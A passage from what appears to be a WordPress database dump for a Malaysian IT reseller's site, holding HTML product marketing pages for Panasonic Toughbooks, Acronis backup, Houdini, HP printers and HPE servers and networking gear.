Toughpad devices through to our super stylish Toughpad 4K. All models are designed for your needs with the latest technologies and are capable of withstanding the conditions you operate in and can help you go further, achieve more and transform the way you work.\r\n<h5>The Fully Rugged Toughbook models meet the demands of the most challenging working environments</h5>\r\nThe fully rugged Toughbook models are dust, water, vibration and drop proof from a height of up to 180cm. The Toughbook range is designed to operate in both extremely low and high temperatures, and come in a variety of formats from laptop to tablet.\r\n\r\nAs well as being resistant to hostile and demanding environments such as construction sites, hospitals, underground excavations, emergency situations encountered by the emergency services, airline maintenance and management, utility services maintenance, and transport, they offer daylight visible screens, excellent graphics and long battery life. The fully rugged Toughbook models can meet almost every challenge business, utility or military service can deliver and ensure that mobile workers can access volumes of data and deliver information in real time wherever they are, increasing efficiency and productivity.\r\n<h5>The Semi Rugged and Business Ruggedised Toughbook models</h5>\r\n<a href=\"https://business.panasonic.com.my/computer-product/products-and-accessories/introducing-the-full-toughbook-range/semi-ruggedized-notebooks\">Semi Rugged Toughbook models</a>Â are water resistant and capable of withstanding being dropped* with a toughened casing. Semi Rugged notebook and convertible tablet models mean these mobile business computing solutions support workers in the field in diverse circumstances such as enabling police officers to take witness statements electronically, telephone engineers to work more effectively across the network and business travelers to effectively deliver presentations using the flip screen technology of the CF-C2.\r\n\r\nLong battery life, optional GPS and the option of technology that allows batteries to be changed whilst working, mean there is a model of semi rugged Toughbook suitable for every business that needs robust mobile computing solutions.\r\n\r\nThe Toughbook flip over business ruggedisedÂ <a href=\"https://business.panasonic.com.my/computer-product/business-ruggedized/cf-mx4\">CF-MX4</a>Â is light, with an attractive design making it perfect for the busy business traveler allowing them to keep in touch with the office and work effectively on the move. The Toughbook is resistant to being dropped,* and withstands 100kg/f pressure, providing business travelers a robust alternative to more fragile mobile computing options.\r\n<h6>*From a height of 76cm.</h6>\r\n&nbsp;\r\n<h5>Computer docking solutions and accessories make Toughbook and Toughpad versatile and convenient</h5>\r\nWe offer a range of docking solutions, car chargers, battery chargers, bags, carrying straps and other accessories to ensure your business gets optimum performance from your Panasonic Toughbook and Toughpad devices. Click the link below to find out more about what is available.\r\n<h5>Professional Services to help you manage Toughbook and Toughpad hardware</h5>\r\nPanasonic is committed to providing you with the right computer product solution for your business. This is reflected in the range of professional services we offer. We can help with deployment to your workforce ensuring they have all the tools they need to work effectively and offer a buy-back programme for larger customers, to help you manage your investment in mobile working.\r\n\r\nTo discover more about the Toughbook and Toughpad range, please click the buttons below or contact us to discuss your needs.\r\n\r\n</div>\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>','Panasonic Toughbook','','inherit','closed','closed','','1571-revision-v1','','','2018-12-13 21:30:04','2018-12-13 13:30:04','',1571,'https://bintara.com.my/blog/2018/12/13/1571-revision-v1/',0,'revision','',0),(1522,1,'2018-12-11 15:05:02','2018-12-11 07:05:02','<h2>Acronis Backup Software for Business</h2>\r\n<h2></h2>\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2018-12-11 15:05:02','2018-12-11 07:05:02','',1435,'https://bintara.com.my/blog/2018/12/11/1435-revision-v1/',0,'revision','',0),(1526,1,'2018-12-11 15:35:26','2018-12-11 07:35:26','Houdini is built from the ground up to be a procedural system that empowers artists to work freely, create multiple iterations and rapidly share workflows with colleagues.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>FLEXIBLE</h2>\r\n<h3>Node-based Workflow</h3>\r\n</div>\r\nIn Houdini, every action is stored in a node. These nodes are then â€œwiredâ€ into networks which define a â€œrecipeâ€ that can be tweaked to refine the outcome then repeated to create similar yet unique results. The ability for nodes to be saved and to pass information, in the form of attributes, down the chain is what gives Houdini its procedural nature.\r\n\r\n&nbsp;\r\n<h2>INTUITIVE</h2>\r\n<h3>Artist Friendly Tools</h3>\r\nWhile the nodes are what makes Houdini unique and give it power, there are lots of viewport and shelf tools that allow for artist-friendly viewport interactions. Behind the scenes, Houdini builds up the nodes and networks for you. Houdini let\'s artists explore different creative paths because it is easy to branch off a new node to explore alternative solutions.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>NEXT LEVEL</h2>\r\n<h3>VFX &amp; Simulation</h3>\r\n</div>\r\nVisual effects artists gravitate to Houdini because its procedural workflow is ideal for creating sophisticated particle and dynamic simulations. Effects are typically designed to react to actions taking place in a shot and a procedural solution â€œautomatesâ€ these reactions providing studios with more creative control and more rapid turnaround.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>DIRECTABLE</h2>\r\n<h3>Shots &amp; Multiple Iterations</h3>\r\n</div>\r\nHoudini lets you make creative decisions deep into production as changes made to Houdini nodes cascade through the network to create a new and unique result. This directability is retained throughout the creative process and can be used to make last minute decisions that would be too costly in a traditional CG pipeline.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>POWERFUL</h2>\r\n<h3>Pipeline in a Box</h3>\r\n</div>\r\nWhether you are setting up a shot or building a game level, Houdini lets you create tools that can be reused many times during a projectâ€™s life cycle. Instead of simply reacting to issues and problems, you will be able to plan ahead and visualize and refine your pipeline.\r\n\r\n&nbsp;\r\n<div class=\"display\">\r\n<h2>ROBUST</h2>\r\n<h3>Asset Creation Tools</h3>\r\n</div>\r\nA big benefit of Houdiniâ€™s node-based approach is the ability to encapsulate node networks into custom nodes that are shareable. Create these digital assets without writing any code then share them with other Houdini artists.\r\n\r\nWith the Houdini Engine, open assets in other applications such as Autodesk Maya, Autodesk 3ds Max, C4D, UE4 and Unity with the assetâ€™s procedural controls available for editing in the host app.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Houdini','','publish','closed','closed','','houdini','','','2019-10-01 12:02:28','2019-10-01 04:02:28','',0,'https://bintara.com.my/?page_id=1526',0,'page','',0),(1528,1,'2018-12-11 15:35:41','2018-12-11 07:35:41','<h2>HP DesignJet large-format office printers</h2><p>These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T120-Printer.jpg\" alt=\"\" width=\"242\" height=\"185\" /></p><h3 style=\"text-align: center;\"><strong>HP DesignJet T120 Printer</strong></h3><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T1700-Printer-series.jpg\" alt=\"\" width=\"196\" height=\"196\" /><h3 style=\"text-align: center;\"><strong>HP DesignJet T1700 Printer series</strong></h3><h2>The most affordable and compact HP DesignJet printer</h2>The HP DesignJet T120 Printer fits your budget and your space. Install this compact printer where it\'s most convenient, and enjoy wireless connectivity and easy-to-use features.<h2>Secure, empowering printer for CAD/GIS workgroups</h2>Confidently take CAD, GIS color reproduction to the next level with a 44-in HP DesignJet printer that delivers powerful security features, high productivity on even the most complex files, and bright and precise colors. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T830-Multifunction-Printer-series.jpg\" alt=\"\" width=\"272\" height=\"181\" /></p><h3 style=\"text-align: center;\"><strong>HP DesignJet T830 Multifunction Printer series</strong></h3><h2 style=\"text-align: center;\">Smart choice for evolving architect/construction offices</h2>Immediately update all your partners on project review results with the most compact large-format MFP. Intuitive, convenient print/scan/copy and HP DesignJet print quality help you communicate effectively and move the project forward. Dynamic security: Cartridges with non-HP chips might not work today or in the future.<h3><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-T3500-Production-Multifunction-Printer.jpg\" alt=\"\" width=\"199\" height=\"199\" /></h3><h3 style=\"text-align: center;\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</h3><h2>HP DesignJet large-format production printers</h2><p>Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</p><h2>Productivity in full color</h2>As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6610-Production-Printer.jpg\" alt=\"\" width=\"240\" height=\"184\" /><h3 style=\"text-align: center;\"><strong>HP DesignJet Z6610 Production Printer</strong></h3><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HP-DesignJet-Z6810-Production-Printer-series.jpg\" alt=\"\" width=\"312\" height=\"166\" /></p><h3 style=\"text-align: center;\"><strong>HP DesignJet Z6810 Production Printer series</strong></h3><h2>The fastest graphics production printing solution</h2>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.<h2 style=\"text-align: center;\">Meet customer high-quality expectations with the fastest production printing solution</h2><p style=\"text-align: center;\">Consistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.</p>To discover more, please click the buttons below or contact us to discuss your needs.Â [maxbutton id=\"1\" ]','HP DesignJet large-format office printers','','publish','closed','closed','','designjet-large-format-office-printers','','','2019-10-01 14:42:43','2019-10-01 06:42:43','',0,'https://bintara.com.my/?page_id=1528',0,'page','',0),(1529,1,'2018-12-11 15:35:56','2018-12-11 07:35:56','<h2>SERVER AND SYSTEM</h2><h2 style=\"text-align: center;\"><strong>Rack Servers</strong></h2><p style=\"text-align: center;\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL325 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL325-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Secure and versatile single socket (1P) 1U AMD EPYCâ„¢ based platform offers an exceptional balance of processor, memory and I/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant DL385 Gen10 Server</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-DL385-Gen10-Server.png\" alt=\"\" width=\"241\" height=\"181\" /></p><p style=\"text-align: center;\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.</p><h4 style=\"text-align: center;\"><strong>HPE Apollo 6000 Chassis</strong></h4><hr /><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Apollo-6000-Chassis.png\" alt=\"\" width=\"235\" height=\"160\" /></p><p style=\"text-align: center;\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customerâ€™s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Tower Servers</strong></h2><p style=\"text-align: center;\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML110 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML110-Gen10-Server.png\" alt=\"\" width=\"226\" height=\"169\" /></p><p style=\"text-align: center;\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businessesâ€™ needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.</p><h4 style=\"text-align: center;\"><strong>HPE ProLiant ML350 Gen10 Server</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-ProLiant-ML350-Gen10-Server.png\" alt=\"\" width=\"232\" height=\"185\" /></p><p style=\"text-align: center;\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.Â The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>HPE Synergy</strong></h2><p style=\"text-align: center;\">Composable, software-defined infrastructure that speeds application delivery.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy 12000 Frame</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-12000-Frame.png\" alt=\"\" width=\"226\" height=\"170\" /></p><p style=\"text-align: center;\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.</p><h4 style=\"text-align: center;\"><strong>HPE Synergy D3940 Storage Module</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Synergy-D3940-Storage-Module.png\" alt=\"\" width=\"222\" height=\"166\" /></p><p style=\"text-align: center;\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Data Storage</strong></h2><p style=\"text-align: center;\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.</p><h4 style=\"text-align: center;\"><strong>HPE StoreOnce Systems</strong></h4><hr /><p style=\"text-align: center;\">Â <br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-StoreOnce-Systems.png\" alt=\"\" width=\"208\" height=\"156\" /></p><p style=\"text-align: center;\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 8000 Storage</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-8000-Storage.png\" alt=\"\" width=\"232\" height=\"166\" /></p><p style=\"text-align: center;\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesnâ€™t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.</p><h4 style=\"text-align: center;\"><strong>HPE 3PAR StoreServ 9000 Storage</strong></h4>\n<hr />\n&nbsp;\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-3PAR-StoreServ-9000-Storage.png\" alt=\"\" width=\"222\" height=\"171\" />\n<p style=\"text-align: center;\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads â€“ for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2>NETWORKING</h2><h2 style=\"text-align: center;\"><strong>Router</strong></h2><p style=\"text-align: center;\">Navigate more devices and simplify complex networks with intelligent management of open standards routing.</p><h4 style=\"text-align: center;\"><strong>HPE FLexNetwork MSR95x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FLexNetwork-MSR95x-Router-Series.png\" alt=\"\" width=\"227\" height=\"171\" /></p><p style=\"text-align: center;\">HPE MSR95x Router Series delivers high-performance, small branch routing in a single, cost-optimized form factor. Featuring integrated routing, switching, wireless, security, and voice with no additional licensing, boost your service delivery while simplifying the management of the corporate WAN. This series is flexible to deploy, with Zero Touch Provisioning and WAN options with LTE connectivity. With Comware v7 and fiber connections, the MSR95x also brings the performance and advanced services available on modular routers, such as IPS and high encryption, to a fixed port form factor.</p><h4 style=\"text-align: center;\"><strong>Alcatel-Lucent 7750 Service Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Alcatel-Lucent-7750-Service-Router-Series.png\" alt=\"\" width=\"229\" height=\"171\" /></p><p style=\"text-align: center;\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.</p><h4 style=\"text-align: center;\"><strong>HPE FlexNetwork MSR93x Router Series</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-FlexNetwork-MSR93x-Router-Series.png\" alt=\"\" width=\"232\" height=\"188\" /></p><p style=\"text-align: center;\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>		\n		<h2 style=\"text-align: center;\"><strong>Switches</strong></h2><h4 style=\"text-align: center;\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\" alt=\"\" width=\"219\" height=\"165\" /></p><p style=\"text-align: center;\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.</p><h4 style=\"text-align: center;\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch</strong></h4><hr /><p style=\"text-align: center;\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\" alt=\"\" width=\"244\" height=\"184\" /></p><p style=\"text-align: center;\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100/50/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100/50GbE spine switches. It is optimized for data center hot/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.</p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p><hr />\n&nbsp;\n<p style=\"text-align: center;\"><strong>[maxbutton id=\"13\"]</strong></p>&nbsp;\n&nbsp;\n<p style=\"text-align: center;\">To discover more, please click the button below or contact us to discuss your needs.</p>\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','HPE','','publish','closed','closed','','hpe','','','2019-10-01 17:39:29','2019-10-01 09:39:29','',0,'https://bintara.com.my/?page_id=1529',0,'page','',0),(1521,1,'2018-12-11 14:52:29','2018-12-11 06:52:29','<h2>Acronis Backup Software for Business</h2>\r\n<h2></h2>\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"><colgroup><col /><col /><col /></colgroup>\r\n<tbody>\r\n<tr>\r\n<td></td>\r\n<th>Acronis True Image</th>\r\n<th>Acronis Backup</th>\r\n</tr>\r\n<tr>\r\n<td>Users</td>\r\n<td>Up to 5 computers</td>\r\n<td>Starting from 2 workstations</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">Types of devices</td>\r\n</tr>\r\n<tr>\r\n<td>Endpoints</td>\r\n<td class=\"checked\"></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Mobile devices</td>\r\n<td class=\"checked\"></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Virtual servers</td>\r\n<td></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Physical servers</td>\r\n<td></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Multi-platform protection</td>\r\n<td>Supports 4 platforms: Windows, macOS, Android, iOS</td>\r\n<td>Supports 21 platforms: incl. Windows Server, Linux, vSphere, Hyper-V, Mac, Microsoft Exchange, SQL Server, SharePoint and more</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">Flexible backup options</td>\r\n</tr>\r\n<tr>\r\n<td>Full image backup</td>\r\n<td class=\"checked\"></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Hybrid backup (local and cloud)</td>\r\n<td class=\"checked\"></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Remote &amp; automated bare metal recovery</td>\r\n<td></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Active disk cloning</td>\r\n<td class=\"checked\"></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>All-in-one recovery tool</td>\r\n<td class=\"checked\"></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\">Powerful features</td>\r\n</tr>\r\n<tr>\r\n<td>Active ransomware protection</td>\r\n<td class=\"checked\"></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>End-to-end AES-256 encryption</td>\r\n<td class=\"checked\"></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Cryptomining malware blocker</td>\r\n<td class=\"checked\"></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Advanced reporting</td>\r\n<td></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Customizable dashboards</td>\r\n<td></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Administrator roles and delegations</td>\r\n<td></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td>Event-based backup scheduling</td>\r\n<td></td>\r\n<td class=\"checked\"></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td>\r\n<div class=\"buyblock\">\r\n<div class=\"buyblock__title\">The World\'s #1 Personal Backup</div>\r\n<div class=\"buyblock__title\">From $49.99per year</div>\r\n<a class=\"btn btn_green btn_cart\" href=\"https://www.acronis.com/en-us/personal/buy-backup/\">Buy</a><a href=\"https://www.acronis.com/en-us/homecomputing/thanks/acronis-true-image-2019/\">Try free for 30 days</a><a href=\"https://www.acronis.com/en-us/personal/computer-backup/\">See product details</a></div></td>\r\n<td>\r\n<div class=\"buyblock\">\r\n<div class=\"buyblock__title\">The Most Secure Business Backup</div>\r\n<div class=\"buyblock__title\">Freefor 30 days</div>\r\n<a class=\"btn btn_blue btn_arow\" href=\"https://www.acronis.com/en-us/business/backup/trial/?SFDCCampaignID=70150000001IJRZ\">Try</a><a href=\"https://www.acronis.com/en-us/business/backup/purchasing/advanced/\">Buy from $99 per year</a><a href=\"https://www.acronis.com/en-us/business/backup/\">See product details</a></div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2018-12-11 14:52:29','2018-12-11 06:52:29','',1435,'https://bintara.com.my/blog/2018/12/11/1435-revision-v1/',0,'revision','',0),(1531,1,'2018-12-11 15:36:36','2018-12-11 07:36:36','<p style=\"text-align: center;\"><strong><em>InFocus</em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone/anytime/anywhere<wbr />.</strong></p><h3 style=\"text-align: center;\"><strong>Mondopad</strong></h3><p style=\"text-align: center;\">Flexible, collaborative touchscreen solutions that work the way you do.</p><h3 style=\"text-align: center;\"><strong>Collaboration that Fits</strong></h3><p style=\"text-align: center;\">The Mondopad family of touchscreen collaboration solutions help teams work together more efficientlyâ€”in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with 